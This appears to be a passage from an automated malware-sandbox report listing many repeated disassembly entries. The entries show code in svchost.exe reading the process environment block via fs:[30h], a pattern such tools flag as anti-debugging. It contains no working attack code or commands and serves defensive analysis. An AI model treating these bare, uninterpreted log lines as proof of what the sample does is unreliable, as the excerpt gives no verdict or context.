                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]2_2_03834690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]2_2_03834690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C6A6 mov eax, dword ptr fs:[00000030h]2_2_0386C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038666B0 mov eax, dword ptr fs:[00000030h]2_2_038666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0386A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A6C7 mov eax, dword ptr fs:[00000030h]2_2_0386A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]2_2_038B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]2_2_038B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE609 mov eax, dword ptr fs:[00000030h]2_2_038AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872619 mov eax, dword ptr fs:[00000030h]2_2_03872619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E627 mov eax, dword ptr fs:[00000030h]2_2_0384E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03866620 mov eax, dword ptr fs:[00000030h]2_2_03866620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868620 mov eax, dword ptr fs:[00000030h]2_2_03868620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383262C mov eax, dword ptr fs:[00000030h]2_2_0383262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384C640 mov eax, dword ptr fs:[00000030h]2_2_0384C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]2_2_038F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]2_2_038F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]2_2_0386A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]2_2_0386A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03862674 mov eax, dword ptr fs:[00000030h]2_2_03862674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832582 mov eax, dword ptr fs:[00000030h]2_2_03832582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832582 mov ecx, dword ptr fs:[00000030h]2_2_03832582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864588 mov eax, dword ptr fs:[00000030h]2_2_03864588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E59C mov eax, dword ptr fs:[00000030h]2_2_0386E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]2_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]2_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]2_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]2_2_038545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]2_2_038545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]2_2_0386E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]2_2_0386E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038365D0 mov eax, dword ptr fs:[00000030h]2_2_038365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]2_2_0386A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]2_2_0386A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038325E0 mov eax, dword ptr fs:[00000030h]2_2_038325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]2_2_0386C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]2_2_0386C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6500 mov eax, dword ptr fs:[00000030h]2_2_038C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]2_2_03838550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]2_2_03838550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]2_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]2_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]2_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EA49A mov eax, dword ptr fs:[00000030h]2_2_038EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038364AB mov eax, dword ptr fs:[00000030h]2_2_038364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038644B0 mov ecx, dword ptr fs:[00000030h]2_2_038644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BA4B0 mov eax, dword ptr fs:[00000030h]2_2_038BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038304E5 mov ecx, dword ptr fs:[00000030h]2_2_038304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]2_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]2_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]2_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]2_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]2_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]2_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C427 mov eax, dword ptr fs:[00000030h]2_2_0382C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A430 mov eax, dword ptr fs:[00000030h]2_2_0386A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EA456 mov eax, dword ptr fs:[00000030h]2_2_038EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382645D mov eax, dword ptr fs:[00000030h]2_2_0382645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385245A mov eax, dword ptr fs:[00000030h]2_2_0385245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC460 mov ecx, dword ptr fs:[00000030h]2_2_038BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]2_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]2_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]2_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]2_2_03840BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]2_2_03840BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h]2_2_038E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h]2_2_038E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]2_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]2_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]2_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]2_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]2_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]2_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DEBD0 mov eax, dword ptr fs:[00000030h]2_2_038DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]2_2_03838BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]2_2_03838BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]2_2_03838BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EBFC mov eax, dword ptr fs:[00000030h]2_2_0385EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BCBF0 mov eax, dword ptr fs:[00000030h]2_2_038BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904B00 mov eax, dword ptr fs:[00000030h]2_2_03904B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]2_2_0385EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]2_2_0385EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]2_2_038F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]2_2_038F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h]2_2_038E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h]2_2_038E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]2_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]2_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]2_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]2_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]2_2_038C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]2_2_038C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FAB40 mov eax, dword ptr fs:[00000030h]2_2_038FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D8B42 mov eax, dword ptr fs:[00000030h]2_2_038D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828B50 mov eax, dword ptr fs:[00000030h]2_2_03828B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DEB50 mov eax, dword ptr fs:[00000030h]2_2_038DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382CB7E mov eax, dword ptr fs:[00000030h]2_2_0382CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904A80 mov eax, dword ptr fs:[00000030h]2_2_03904A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868A90 mov edx, dword ptr fs:[00000030h]2_2_03868A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]2_2_03838AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]2_2_03838AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886AA4 mov eax, dword ptr fs:[00000030h]2_2_03886AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830AD0 mov eax, dword ptr fs:[00000030h]2_2_03830AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]2_2_03864AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]2_2_03864AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]2_2_0386AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]2_2_0386AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BCA11 mov eax, dword ptr fs:[00000030h]2_2_038BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA24 mov eax, dword ptr fs:[00000030h]2_2_0386CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EA2E mov eax, dword ptr fs:[00000030h]2_2_0385EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]2_2_03854A35
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0386CA38 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038DEA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038B89B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038C69C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]
